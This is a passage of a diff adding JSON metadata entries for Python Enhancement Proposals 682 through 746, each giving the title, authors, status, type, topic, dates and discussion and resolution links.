"replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0682/" + }, + "683": { + "number": 683, + "title": "Immortal Objects, Using a Fixed Refcount", + "authors": "Eric Snow, Eddie Elizondo", + "discussions_to": "https://discuss.python.org/t/18183", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2022", + "python_version": "3.12", + "post_history": "`16-Feb-2022 `__, `19-Feb-2022 `__, `28-Feb-2022 `__, `12-Aug-2022 `__,", + "resolution": "https://discuss.python.org/t/18183/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0683/" + }, + "684": { + "number": 684, + "title": "A Per-Interpreter GIL", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-684-a-per-interpreter-gil/19583", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2022", + "python_version": "3.12", + "post_history": "`08-Mar-2022 `__, `29-Sep-2022 `__, `28-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19583/42", + "requires": "683", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0684/" + }, + "685": { + "number": 685, + "title": "Comparison of extra names for optional distribution dependencies", + "authors": "Brett Cannon", + "discussions_to": "https://discuss.python.org/t/14141", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Mar-2022", + "python_version": null, + "post_history": "`08-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/pep-685-comparison-of-extra-names-for-optional-distribution-dependencies/14141/55", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0685/" + }, + "686": { + "number": 686, + "title": "Make UTF-8 mode default", + "authors": "Inada Naoki", + "discussions_to": "https://discuss.python.org/t/14737", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "18-Mar-2022", + "python_version": "3.15", + "post_history": "`18-Mar-2022 `__, `31-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/14737/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0686/" + }, + "687": { + "number": 687, + "title": "Isolating modules in the standard library", + "authors": "Erlend Egeberg Aasland, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/14824", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2022", + "python_version": "3.12", + "post_history": "`04-Apr-2022 `__, `11-Apr-2022 `__", + "resolution": "https://discuss.python.org/t/14824/4", + "requires": "489, 573, 630", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0687/" + }, + "688": { + "number": 688, + "title": "Making the buffer protocol accessible in Python", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/19756", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "23-Apr-2022", + "python_version": "3.12", + "post_history": "`23-Apr-2022 `__, `25-Apr-2022 `__, `06-Oct-2022 `__, `26-Oct-2022 `__", + "resolution": "`07-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0688/" + }, + "689": { + "number": 689, + "title": "Unstable C API tier", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2022", + "python_version": "3.12", + "post_history": "`27-Apr-2022 `__, `25-Aug-2022 `__, `27-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452/13", + "requires": "523", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0689/" + }, + "690": { + "number": 690, + "title": "Lazy Imports", + "authors": "Germ\u00e1n M\u00e9ndez Bravo, Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-690-lazy-imports/15474", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2022", + "python_version": "3.12", + "post_history": "`03-May-2022 `__, `03-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-690-lazy-imports-again/19661/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0690/" + }, + "691": { + "number": 691, + "title": "JSON-based Simple API for Python Package Indexes", + "authors": "Donald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "04-May-2022", + "python_version": null, + "post_history": "`05-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553/70", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0691/" + }, + "692": { + "number": 692, + "title": "Using TypedDict for more precise \\*\\*kwargs typing", + "authors": "Franek Magiera", + "discussions_to": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-May-2022", + "python_version": "3.12", + "post_history": "`29-May-2022 `__, `12-Jul-2022 `__, `12-Jul-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314/81", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0692/" + }, + "693": { + "number": 693, + "title": "Python 3.12 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-May-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0693/" + }, + "694": { + "number": 694, + "title": "Upload 2.0 API for Python Package Repositories", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-694-upload-2-0-api-for-python-package-repositories/16879", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Jun-2022", + "python_version": null, + "post_history": "`27-Jun-2022 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0694/" + }, + "695": { + "number": 695, + "title": "Type Parameter Syntax", + "authors": "Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/BB2BGYJY2YG5IWESKGTAPUQL3N27ZKVW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Jun-2022", + "python_version": "3.12", + "post_history": "`20-Jun-2022 `__, `04-Dec-2022 `__", + "resolution": "https://discuss.python.org/t/pep-695-type-parameter-syntax/21646/92", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0695/" + }, + "696": { + "number": 696, + "title": "Type Defaults for Type Parameters", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Jul-2022", + "python_version": "3.13", + "post_history": "`22-Mar-2022 `__, `08-Jan-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569/34", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0696/" + }, + "697": { + "number": 697, + "title": "Limited C API for Extending Opaque Types", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/19743", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2022", + "python_version": "3.12", + "post_history": "`24-May-2022 `__, `06-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19743/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0697/" + }, + "698": { + "number": 698, + "title": "Override Decorator for Static Typing", + "authors": "Steven Troxler, Joshua Xu, Shannon Zhu", + "discussions_to": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Sep-2022", + "python_version": "3.12", + "post_history": "`20-May-2022 `__, `17-Aug-2022 `__, `11-Oct-2022 `__, `07-Nov-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839/11", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0698/" + }, + "699": { + "number": 699, + "title": "Remove private dict version field added in PEP 509", + "authors": "Ken Jin", + "discussions_to": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "03-Oct-2022", + "python_version": "3.12", + "post_history": "`05-Oct-2022 `__", + "resolution": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724/13", + "requires": null, + "replaces": "509", + "superseded_by": null, + "url": "https://peps.python.org/pep-0699/" + }, + "700": { + "number": 700, + "title": "Additional Fields for the Simple API for Package Indexes", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-700-additional-fields-for-the-simple-api-for-package-indexes/20177", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Oct-2022", + "python_version": null, + "post_history": "`21-Oct-2022 `__", + "resolution": "`19-Dec-2022 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0700/" + }, + "701": { + "number": 701, + "title": "Syntactic formalization of f-strings", + "authors": "Pablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta G\u00f3mez Mac\u00edas", + "discussions_to": "https://discuss.python.org/t/pep-701-syntactic-formalization-of-f-strings/22046", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2022", + "python_version": "3.12", + "post_history": "`19-Dec-2022 `__,", + "resolution": "`14-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0701/" + }, + "702": { + "number": 702, + "title": "Marking deprecations using the type system", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-702-marking-deprecations-using-the-type-system/23036", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Dec-2022", + "python_version": "3.13", + "post_history": "`01-Jan-2023 `__, `22-Jan-2023 `__", + "resolution": "`07-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0702/" + }, + "703": { + "number": 703, + "title": "Making the Global Interpreter Lock Optional in CPython", + "authors": "Sam Gross", + "discussions_to": "https://discuss.python.org/t/22606", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "09-Jan-2023", + "python_version": "3.13", + "post_history": "`09-Jan-2023 `__, `04-May-2023 `__", + "resolution": "`24-Oct-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0703/" + }, + "704": { + "number": 704, + "title": "Require virtual environments by default for package installers", + "authors": "Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/22846", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jan-2023", + "python_version": null, + "post_history": "`16-Jan-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0704/" + }, + "705": { + "number": 705, + "title": "TypedDict: Read-only items", + "authors": "Alice Purcell", + "discussions_to": "https://discuss.python.org/t/pep-705-read-only-typeddict-items/37867", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Nov-2022", + "python_version": "3.13", + "post_history": "`30-Sep-2022 `__, `02-Nov-2022 `__, `14-Mar-2023 `__, `17-Oct-2023 `__, `04-Nov-2023 `__,", + "resolution": "`29-Feb-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0705/" + }, + "706": { + "number": 706, + "title": "Filter for tarfile.extractall", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/23903", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Jan-2023 `__, `15-Feb-2023 `__,", + "resolution": "https://discuss.python.org/t/23903/10", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0706/" + }, + "707": { + "number": 707, + "title": "A simplified signature for __exit__ and __aexit__", + "authors": "Irit Katriel", + "discussions_to": "https://discuss.python.org/t/24402", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Feb-2023", + "python_version": "3.12", + "post_history": "`02-Mar-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-707-a-simplified-signature-for-exit-and-aexit/24402/46", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0707/" + }, + "708": { + "number": 708, + "title": "Extending the Repository API to Mitigate Dependency Confusion Attacks", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/24179", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Feb-2023", + "python_version": null, + "post_history": "`01-Feb-2023 `__, `23-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/24179/72", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0708/" + }, + "709": { + "number": 709, + "title": "Inlined comprehensions", + "authors": "Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240/36", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0709/" + }, + "710": { + "number": 710, + "title": "Recording the provenance of installed packages", + "authors": "Fridol\u00edn Pokorn\u00fd", + "discussions_to": "https://discuss.python.org/t/pep-710-recording-the-provenance-of-installed-packages/25428", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Mar-2023", + "python_version": null, + "post_history": "`03-Dec-2021 `__, `30-Jan-2023 `__, `14-Mar-2023 `__, `03-Apr-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0710/" + }, + "711": { + "number": 711, + "title": "PyBI: a standard format for distributing Python Binaries", + "authors": "Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/pep-711-pybi-a-standard-format-for-distributing-python-binaries/25547", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Apr-2023", + "python_version": null, + "post_history": "`06-Apr-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0711/" + }, + "712": { + "number": 712, + "title": "Adding a \"converter\" parameter to dataclasses.field", + "authors": "Joshua Cannon", + "discussions_to": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2023", + "python_version": "3.13", + "post_history": "`27-Dec-2022 `__, `19-Jan-2023 `__, `23-Apr-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126/98", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0712/" + }, + "713": { + "number": 713, + "title": "Callable Modules", + "authors": "Amethyst Reese", + "discussions_to": "https://discuss.python.org/t/pep-713-callable-modules/26127", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Apr-2023", + "python_version": "3.12", + "post_history": "`23-Apr-2023 `__", + "resolution": "https://discuss.python.org/t/26127/86", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0713/" + }, + "714": { + "number": 714, + "title": "Rename dist-info-metadata in the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/27471", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`06-Jun-2023 `__", + "resolution": "`27-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0714/" + }, + "715": { + "number": 715, + "title": "Disabling bdist_egg distribution uploads on PyPI", + "authors": "William Woodruff", + "discussions_to": "https://discuss.python.org/t/27610", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`09-Jun-2023 `__", + "resolution": "`24-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0715/" + }, + "718": { + "number": 718, + "title": "Subscriptable functions", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/28457/", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "23-Jun-2023", + "python_version": "3.13", + "post_history": "`24-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0718/" + }, + "719": { + "number": 719, + "title": "Python 3.13 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "26-May-2023", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0719/" + }, + "720": { + "number": 720, + "title": "Cross-compiling Python packages", + "authors": "Filipe La\u00edns", + "discussions_to": null, + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "01-Jul-2023", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0720/" + }, + "721": { + "number": 721, + "title": "Using tarfile.data_filter for source distribution extraction", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2023", + "python_version": "3.12", + "post_history": "`04-Jul-2023 `__,", + "resolution": "`02-Aug-2023 `__", + "requires": "706", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0721/" + }, + "722": { + "number": 722, + "title": "Dependency specification for single-file scripts", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/29905", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Jul-2023", + "python_version": null, + "post_history": "`19-Jul-2023 `__", + "resolution": "https://discuss.python.org/t/pep-722-723-decision/36763/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0722/" + }, + "723": { + "number": 723, + "title": "Inline script metadata", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/31151", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Aug-2023", + "python_version": null, + "post_history": "`04-Aug-2023 `__, `06-Aug-2023 `__, `23-Aug-2023 `__, `06-Dec-2023 `__,", + "resolution": "`08-Jan-2024 `__", + "requires": null, + "replaces": "722", + "superseded_by": null, + "url": "https://peps.python.org/pep-0723/" + }, + "724": { + "number": 724, + "title": "Stricter Type Guards", + "authors": "Rich Chiodo, Eric Traut, Erik De Bonte", + "discussions_to": "https://discuss.python.org/t/pep-724-stricter-type-guards/34124", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "typing", + "created": "28-Jul-2023", + "python_version": "3.13", + "post_history": "`30-Dec-2021 `__, `19-Sep-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0724/" + }, + "725": { + "number": 725, + "title": "Specifying external dependencies in pyproject.toml", + "authors": "Pradyun Gedam, Ralf Gommers", + "discussions_to": "https://discuss.python.org/t/31888", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Aug-2023", + "python_version": null, + "post_history": "`18-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0725/" + }, + "726": { + "number": 726, + "title": "Module ``__setattr__`` and ``__delattr__``", + "authors": "Sergey B Kirpichev", + "discussions_to": "https://discuss.python.org/t/32640/", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2023", + "python_version": "3.13", + "post_history": "`06-Apr-2023 `__, `31-Aug-2023 `__,", + "resolution": "https://discuss.python.org/t/32640/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0726/" + }, + "727": { + "number": 727, + "title": "Documentation in Annotated Metadata", + "authors": "Sebasti\u00e1n Ram\u00edrez", + "discussions_to": "https://discuss.python.org/t/32566", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2023", + "python_version": "3.13", + "post_history": "`30-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0727/" + }, + "728": { + "number": 728, + "title": "TypedDict with Typed Extra Items", + "authors": "Zixuan James Li", + "discussions_to": "https://discuss.python.org/t/pep-728-typeddict-with-typed-extra-items/45443", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "12-Sep-2023", + "python_version": "3.14", + "post_history": "`09-Feb-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0728/" + }, + "729": { + "number": 729, + "title": "Typing governance process", + "authors": "Jelle Zijlstra, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/pep-729-typing-governance-process/35362", + "status": "Active", + "type": "Process", + "topic": "governance, typing", + "created": "19-Sep-2023", + "python_version": null, + "post_history": "`04-Oct-2023 `__, `20-Sep-2023 `__", + "resolution": "`20-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0729/" + }, + "730": { + "number": 730, + "title": "Adding iOS as a supported platform", + "authors": "Russell Keith-Magee", + "discussions_to": "https://discuss.python.org/t/pep730-adding-ios-as-a-supported-platform/35854", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Oct-2023", + "python_version": "3.13", + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-730-adding-ios-as-a-supported-platform/35854/66", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0730/" + }, + "731": { + "number": 731, + "title": "C API Working Group Charter", + "authors": "Guido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel", + "discussions_to": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "11-Oct-2023", + "python_version": null, + "post_history": "`13-Oct-2023 `__, `23-May-2024 `__, `19-Jun-2024 `__", + "resolution": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117/12", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0731/" + }, + "732": { + "number": 732, + "title": "The Python Documentation Editorial Board", + "authors": "Joanna Jablonski", + "discussions_to": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "14-Oct-2023", + "python_version": null, + "post_history": "`20-Oct-2023 `__", + "resolution": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0732/" + }, + "733": { + "number": 733, + "title": "An Evaluation of Python's Public C API", + "authors": "Erlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "16-Oct-2023", + "python_version": null, + "post_history": "`01-Nov-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0733/" + }, + "734": { + "number": 734, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Nov-2023", + "python_version": "3.13", + "post_history": "`14-Dec-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147/24", + "requires": null, + "replaces": "554", + "superseded_by": null, + "url": "https://peps.python.org/pep-0734/" + }, + "735": { + "number": 735, + "title": "Dependency Groups in pyproject.toml", + "authors": "Stephen Rosen", + "discussions_to": "https://discuss.python.org/t/39233", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Nov-2023", + "python_version": null, + "post_history": "`14-Nov-2023 `__, `20-Nov-2023 `__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0735/" + }, + "736": { + "number": 736, + "title": "Shorthand syntax for keyword arguments at invocation", + "authors": "Joshua Bambrick, Chris Angelico", + "discussions_to": "https://discuss.python.org/t/pep-736-keyword-argument-shorthand-final-draft/58504", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2023", + "python_version": "3.14", + "post_history": "`14-Oct-2023 `__, `17-Jan-2024 `__, `17-Jul-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0736/" + }, + "737": { + "number": 737, + "title": "C API to format a type fully qualified name", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Nov-2023", + "python_version": "3.13", + "post_history": "`29-Nov-2023 `__", + "resolution": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872/60", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0737/" + }, + "738": { + "number": 738, + "title": "Adding Android as a supported platform", + "authors": "Malcolm Smith", + "discussions_to": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2023", + "python_version": "3.13", + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975/23", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0738/" + }, + "739": { + "number": 739, + "title": "Static description file for build details of Python installations", + "authors": "Filipe La\u00edns", + "discussions_to": "https://discuss.python.org/t/pep-739-static-description-file-for-build-details-of-python-installations/44572", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Dec-2023", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0739/" + }, + "740": { + "number": 740, + "title": "Index support for digital attestations", + "authors": "William Woodruff, Facundo Tuesca, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-740-index-support-for-digital-attestations/44498", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jan-2024", + "python_version": null, + "post_history": "`02-Jan-2024 `__, `29-Jan-2024 `__", + "resolution": "`17-Jul-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0740/" + }, + "741": { + "number": 741, + "title": "Python Configuration C API", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2024", + "python_version": "3.14", + "post_history": "`19-Jan-2024 `__, `08-Feb-2024 `__,", + "resolution": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403/88", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0741/" + }, + "742": { + "number": 742, + "title": "Narrowing types with TypeIs", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-742-narrowing-types-with-typenarrower/45613", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Feb-2024", + "python_version": "3.13", + "post_history": "`11-Feb-2024 `__", + "resolution": "`03-Apr-2024 `__", + "requires": null, + "replaces": "724", + "superseded_by": null, + "url": "https://peps.python.org/pep-0742/" + }, + "743": { + "number": 743, + "title": "Add Py_COMPAT_API_VERSION to the Python C API", + "authors": "Victor Stinner, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-743-add-py-compat-api-version-to-the-python-c-api-take-2/59323", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0743/" + }, + "744": { + "number": 744, + "title": "JIT Compilation", + "authors": "Brandt Bucher, Savannah Ostrowski", + "discussions_to": "https://discuss.python.org/t/pep-744-jit-compilation/50756", + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "11-Apr-2024", + "python_version": "3.13", + "post_history": "`11-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0744/" + }, + "745": { + "number": 745, + "title": "Python 3.14 Release Schedule", + "authors": "Hugo van Kemenade", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-Apr-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0745/" + }, + "746": { + "number": 746, + "title": "Type checking Annotated metadata", + "authors": "Adrian Garcia Badaracco", + "discussions_to": 